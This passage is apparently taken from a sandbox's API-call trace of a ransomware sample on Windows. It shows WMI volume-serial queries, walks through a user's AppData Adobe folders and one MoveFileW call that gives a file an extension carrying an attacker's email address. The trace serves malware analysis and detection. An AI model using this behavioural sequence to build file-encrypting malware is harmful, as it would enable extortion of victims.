plFlavor=0x36ca9bc*=0) returned 0x0 [0153.107] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.107] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.107] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949ea88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36ca9b8*=8, plFlavor=0x36ca9bc*=0 | out: pVal=0x949ea88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36ca9b8*=8, plFlavor=0x36ca9bc*=0) returned 0x0 [0153.107] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.107] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", nBufferLength=0x105, lpBuffer=0x949e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", lpFilePart=0x0) returned 0x4c [0153.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6f [0153.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eae8) returned 1 [0153.108] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), fInfoLevelId=0x0, lpFileInformation=0x949eb64 | out: lpFileInformation=0x949eb64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x17524900, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0153.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eae4) returned 1 [0153.108] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0153.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0153.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", lpFilePart=0x0) returned 0x44 [0153.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\", lpFilePart=0x0) returned 0x45 [0153.110] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.111] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.111] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xcfc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroFnt10.lst", cAlternateFileName="ACROFN~1.LST")) returned 1 [0153.111] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.111] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0153.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0153.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0153.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", lpFilePart=0x0) returned 0x44 [0153.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\", lpFilePart=0x0) returned 0x45 [0153.112] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.112] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.112] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xcfc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroFnt10.lst", cAlternateFileName="ACROFN~1.LST")) returned 1 [0153.112] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xcfc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroFnt10.lst", cAlternateFileName="ACROFN~1.LST")) returned 0 [0153.112] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0153.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0153.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0153.113] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color", lpFilePart=0x0) returned 0x37 [0153.113] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\", lpFilePart=0x0) returned 0x38 [0153.114] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.114] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.114] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce719dc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x49c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACECache11.lst", cAlternateFileName="ACECAC~1.LST")) returned 1 [0153.114] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0153.114] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 0 [0153.115] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0153.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0153.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0153.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color", lpFilePart=0x0) returned 0x37 [0153.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\", lpFilePart=0x0) returned 0x38 [0153.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.115] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.115] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce719dc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x49c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACECache11.lst", cAlternateFileName="ACECAC~1.LST")) returned 1 [0153.115] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0153.115] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.116] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0153.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0153.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0153.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles", lpFilePart=0x0) returned 0x40 [0153.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\", lpFilePart=0x0) returned 0x41 [0153.116] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.116] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.116] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x102a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wscRGB.icc", cAlternateFileName="")) returned 1 [0153.117] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0xa74, dwReserved0=0x0, dwReserved1=0x0, cFileName="wsRGB.icc", cAlternateFileName="")) returned 1 [0153.117] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.117] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0153.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0153.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0153.117] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles", lpFilePart=0x0) returned 0x40 [0153.117] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\", lpFilePart=0x0) returned 0x41 [0153.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.117] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.118] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x102a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wscRGB.icc", cAlternateFileName="")) returned 1 [0153.118] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0xa74, dwReserved0=0x0, dwReserved1=0x0, cFileName="wsRGB.icc", cAlternateFileName="")) returned 1 [0153.118] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0xa74, dwReserved0=0x0, dwReserved1=0x0, cFileName="wsRGB.icc", cAlternateFileName="")) returned 0 [0153.118] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0153.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0153.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0153.118] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x3c [0153.118] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\", lpFilePart=0x0) returned 0x3d [0153.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, 